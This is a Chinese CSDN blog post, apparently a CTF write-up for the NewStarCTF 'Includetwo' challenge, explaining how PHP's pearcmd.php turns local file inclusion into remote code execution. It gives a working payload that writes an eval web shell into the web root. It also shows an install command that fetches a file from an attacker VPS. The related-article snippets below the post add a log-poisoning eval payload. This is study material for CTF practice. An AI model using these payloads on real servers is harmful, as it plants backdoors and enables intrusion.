LFI TO RCE之pearcmd.php的妙用

最新推荐文章于 2024-04-15 12:07:28 发布
最新推荐文章于 2024-04-15 12:07:28 发布
阅读量2.3k 收藏 12
点赞数 6
文章标签: php web安全
Aiwin
本文链接:https://blog.csdn.net/weixin_53090346/article/details/127241278
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

前言

提示:这里可以添加本文要记录的大概内容:

在玩Buu的NewStarCTF时,遇到了一道LFI to RCE的题,规定了php后缀,一点思路都没有,赛后看了WP,总结一下。

提示:以下是本篇文章正文内容,下面案例可供参考

一、pear是什么

pecl是PHP中用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库。在7.3及以前,pecl/pear是默认安装的;在7.4及以后,需要我们在编译PHP的时候指定--with-pear才会安装。

不过,在Docker任意版本镜像中,pcel/pear都会被默认安装,安装的路径在/usr/local/lib/php

并且php.ini当中 register_argc_argv=On需要开启,假如环境中没有php.ini,则默认register_argc_argv=On。

register_argc_argv=On其实对应了$_SERVER[‘argv’],即获取参数。

如: 

<?php

var_dump($_SERVER['argv']);
$example = $_SERVER['argv'];
$example[0]($example[1]);
?>

 +为分隔符

二、pear的妙用

pear的源代码如下:

#!/bin/sh

# first find which PHP binary to use
if test "x$PHP_PEAR_PHP_BIN" != "x"; then
  PHP="$PHP_PEAR_PHP_BIN"
else
  if test "/usr/bin/php" = '@'php_bin'@'; then
    PHP=php
  else
    PHP="/usr/bin/php"
  fi
fi

# then look for the right pear include dir
if test "x$PHP_PEAR_INSTALL_DIR" != "x"; then
  INCDIR=$PHP_PEAR_INSTALL_DIR
  INCARG="-d include_path=$PHP_PEAR_INSTALL_DIR"
else
  if test "/usr/share/php" = '@'php_dir'@'; then
    INCDIR=`dirname $0`
    INCARG=""
  else
    INCDIR="/usr/share/php"
    INCARG="-d include_path=/usr/share/php"
  fi
fi

exec $PHP -C -q $INCARG -d date.timezone=UTC -d output_buffering=1 -d variables_order=EGPCS -d open_basedir="" -d safe_mode=0 -d register_argc_argv="On" -d auto_prepend_file="" -d auto_append_file="" $INCDIR/pearcmd.php "$@"

PEAR_Command::setFrontendType('CLI');
$all_commands = PEAR_Command::getCommands();

$argv = Console_Getopt::readPHPArgv();
// fix CGI sapi oddity - the -- in pear.bat/pear is not removed
if (php_sapi_name() != 'cli' && isset($argv[1]) && $argv[1] == '--') {
    unset($argv[1]);
    $argv = array_values($argv);
}
public static function readPHPArgv()
    {
        global $argv;
        if (!is_array($argv)) {
            if (!@is_array($_SERVER['argv'])) {
                if (!@is_array($GLOBALS['HTTP_SERVER_VARS']['argv'])) {
                    $msg = "Could not read cmd args (register_argc_argv=Off?)";
                    return PEAR::raiseError("Console_Getopt: " . $msg);
                }
                return $GLOBALS['HTTP_SERVER_VARS']['argv'];
            }
            return $_SERVER['argv'];
        }
        return $argv;
    }
代码不是很理解,就是当执行了pearcmd.cmd,会将$_SERVER[‘argv’]当作参数执行

三、例题:NewStarCTF(Includetwo)

题目如下:

 <?php
error_reporting(0);
highlight_file(__FILE__);
//Can you get shell? RCE via LFI if you get some trick,this question will be so easy!
if(!preg_match("/base64|rot13|filter/i",$_GET['file']) && isset($_GET['file'])){
    include($_GET['file'].".php");
}else{
    die("Hacker!");
} Hacke

 

 payload:+config-create+/&file=/usr/local/lib/php/pearcmd&/<?=eval($_POST[1])?>+/var/www/html/a.php 

不同的系统pearcmd存放的位置好像不一定, 有的在/usr/share/php/pearcmd.php。

关于payload的解释: config-create是pearcmd.php的参数,用于创建默认配置文件。

这个命令需要两个参数,根路径和文件名。所以payload是利用该参数将<?php eval($_POST[1])?>写入到/var/www/html/a.php文件中。

四、本地测试

<?php
include($_GET['file']);
?>

 注意的点:
1、开启了register_argc_argv选项

2、pearcmd.php文件的路径

3、能够进行文件包含,allow_url_include开启

4、open_basedir不存在限制

 还可以使用install或download参数进行远程下载进行RCE:

 

file=/usr/share/php/pearcmd.php&+install+-R+/tmp+http://[vps:ip]/test/peartest.php 

 总结

文件包含到RCE,目前知道的有session包含的条件竞争,日志包含,pearcmd的利用。

M03-Aiwin
关注
  • 6
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
LFI_to_RCE
m0_63045593的博客
04-20 365
LFI_to_RCE 利用session.upload_progress进行文件包含 条件竞争 首先上传PHP_SESSION_UPLOAD_PROGRESS <?php session_start(); ?> 因为session.use_strict_mode默认值为off,所以这时我们可以自定义session id,比如在Cookie里设置PHPSESSID=flag,php就会在服务器上创建一个文件:/tmp/sess_flag,即使此时用户没有初始化se
lfi-labs, 用于实践开发 LFI RFI和CMD注入vulns的小型PHP脚本集.zip
09-18
lfi-labs, 用于实践开发 LFI RFI和CMD注入vulns的小型PHP脚本集 lfi实验室用于实践开发 LFI 。RFI和CMD注入vulns的小型PHP脚本集为什么?用于培训和测试。 你可以测试检测产品( 比如 。 漏洞扫描器),利用工具等。...
pearcmd.php
Sk1y的博客
12-20 3259
pearcmd.php用 文章目录pearcmd.php用1. register_argc_argvcli模式下WEB模式中简单的利用2. pearcmd.php的神奇使用3. register_argc_argv和pear的关系4. payload靶机可出网靶机不可出网时参考链接 1. register_argc_argv 如果环境中含有php.ini,则默认register_argc_argv=Off;如果环境中没有php.ini,则默认register_argc_argv=On 这个regis
[NewStarCTF 公开赛赛道]
最新发布
wxy_1234_的博客
04-15 1553
传入key=badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbad";s:3:"cmd";能过滤掉基本都过滤了,其实正则匹配cat直接c${Z}at​可以执行cat,空格可以用${IFS}​绕过。抓包传入O:7:"ctfshow":2:{ctfshow}得到flag。post传入O:7:"ctfshow":2:{ctfshow}也没用。post传入O:7:"ctfshow":2:{}发现没用。
ctfshow MengXIn 下(pearcmd.php用&条件竞争&简单密码&简单misc)
weixin_63231007的博客
07-22 1791
通过可变信息通过GET方法是类似于参数传递给可执行文件。许多语言处理等方面argc和argv参数。argc是参数计数,并,argv是索引数组,包含的参数。如果您想声明变量$argc和$argv和模仿这种功能,使register_argc_argv。...
From LFI to RCE!!(从本地文件包含到远程命令执行)
Websec
03-03 1571
翻译 原文:https://medium.com/bugbountywriteup/from-lfi-to-rce-96f352ec38c8 作者:Mohamed Sayed 漏洞类型:本地文件包含、远程命令执行 ........ 哈罗,伙伴们,这个主题我们将会讨论从本地文件包含变成远程命令执行的利用. 什么是LFI? 本地文件包含是某些Web应用程序中的漏洞,因为网站从服务器...
LFI to RCE Exploit with Perl Script
cnbird's blog
12-13 2586
http://milw0rm.com/papers/260    |=--------------------------------------------------------------------=| |=-------------=[ LFI to RCE Exploit with Perl Script ]=--------------=|
NSE4-FGT-7.0-DG-RE-lfi2xs学习文档手册.pdf
10-17
NSE4_FGT-7.0-DG-RE-lfi2xs学习文档手册.pdf
LFI.rar_LFI_sick_激光_激光 Visual
09-23
一个开源的激光显示项目,其中包括了测试的简单用例
用golang制作的模糊器,用于查找xss,lfirce,ssti等问题,该问题可通过更改内容长度来检测问题,并使用签名进行验证-Golang开发
05-26
用golang制作的模糊器,用于查找xss,lfirce,ssti等问题,该问题可通过更改内容长度来检测问题,并使用签名进行验证。 什么是BountyIt? 用golang制作的模糊器,用于查找xss,lfirce,ssti等问题,该问题可通过...
finc:扫描利用lfi漏洞
04-03
芬奇利用python3编写的LFI的开发设置: git clone https://github.com/DSimsek000/finccd finc# recommended setup with virtualenvpython -m venv envsource env/bin/activatepip install -r requirements.txt句法...
PHP-从LFIRCE(上)
qq_50643984的博客
08-31 1633
利用的lfi本地文件包含,就是包含一个含有php代码的文件,不限制后缀名,也可以临时文件进行条件竞争,当然php是神奇的语言,有伪协议还有fastcgi,还有auto_prepend_file的参数,内存错误异常退出,甚至可以去看php底层代码,这些特性还有很多,值得我们探索。接下来我们可以从几道ctf题来看一下lfirce。...
【甄选靶场】Vulnhub百个项目渗透——项目五十三:Inclusiveness(更改ua,lfi->rce
人间体佐菲的博客
01-18 630
【甄选靶场】Vulnhub百个项目渗透——项目五十三:Inclusiveness(更改ua,lfi->rce
无需可控文件的LFI-RCE
qq_53263789的博客
02-09 450
前言 在 PHP 中,我们可以利用 PHP Base64 Filter 宽松的解析,通过 iconv filter 等编码组合构造出特定的 PHP 代码进而完成无需临时文件的 RCE 。 利用 <?=`$_GET[0]`;;?> PD89YCRfR0VUWzBdYDs7Pz4= <?php $base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"; $conversions = array( 'R' => 'convert.iconv.UTF8
『CTF Tricks』PHP-用/proc/self/fd触发LFI日志包含完成RCE命令执行([羊城杯 2021]Only 4非预期解)
Ho1aAs‘s Blog
09-12 1589
文章目录前言利用原理参考完 前言 此Trick的使用面非常窄,只适用于特定环境,这里只做特例分析,在后续服务器复现中,fd目录下没有指向日志的文件描述符,若有错误请指出 利用 ?gwht=/proc/self/fd/8&cmd=system('cat /flag'); 'user-agent': '<?php eval($_GET[cmd]);?>' /proc/self/fd/x -> /var/log/nginx/access.log include("/proc/self/
pear常用命令
rethink log
12-10 529
1  pear -V 2  pear help 3  pear list  4  pear list-all 5  pear list-upgrades 列出需要升级的包 6  升级symfony:   pear upgrade symfony/symfony-1.4.1 
利用pearcmd.php本地文件包含(LFI
Mrs_H的博客
01-08 5724
利用pearcmd.php本地文件包含(LFI) 一.前言 pearcmd这个东西很久以前就已经复现过了,但是当时没有记录下来。这些天在整理之前比赛的wp的时候突然看见了pear的LFI到getshell,就突然想起来自己应该是利用过了的。但是怎么找也找不到之前的笔记,于是就有了再复现一遍的想法。 二.正文 1.环境的准备 这里的话我使用的是docker来搭建的一个lamp,然后在这个lamp上面进行后续的漏洞复现。至于为什么这么做呢?照P神的话来说就是因为在Docker任意版本的镜像中pear都会被默认安
利用pearcmd.phpLFI到getshell
feng的博客
10-29 5090
前言 也是从来没有学习过这种LFI的思路。今天晚上再复现前几天的强网杯拟态的时候遇到了这个pearcms.php的文件包含,进行了一波学习。 环境 安装了pear(这样才能有pearcmd.php) 开启了register_argc_argv 存在文件包含且可以包含后缀为php的文件且没有open_basedir的限制。 先说说这个pear。我就说觉得这东西为什么很眼熟,原来昨天看php底层C的目录结构的时候刚看到过。这个东西的全称叫PHP Extension and Application Repos
php 利用pearcmd实现裸文件包含
weixin_45805993的博客
12-03 1874
主要内容参考P神博客https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html 0x00phpinfo与条件竞争 之前做题好像遇到过,再复习一下 我们对任意一个PHP文件发送一个上传的数据包时,不管这个PHP服务后端是否有处理$_FILES的逻辑,PHP都会将用户上传的数据先保存到一个临时文件中,这个文件一般位于系统临时目录,文件名是php开头,后面跟6个随机字符;在整个PHP文件执行完毕后,这些上传的临时文件就会被清理掉
LFI to RCE
10-19
LFI to RCE是指通过本来只能访问服务器上的文件的漏洞(LFI),进一步利用该漏洞实现远程代码执行(RCE)。一般情况下,LFI漏洞只能让攻击者读取服务器上的文件,但是如果攻击者能够找到一个包含可执行代码的文件,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

M03-Aiwin

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值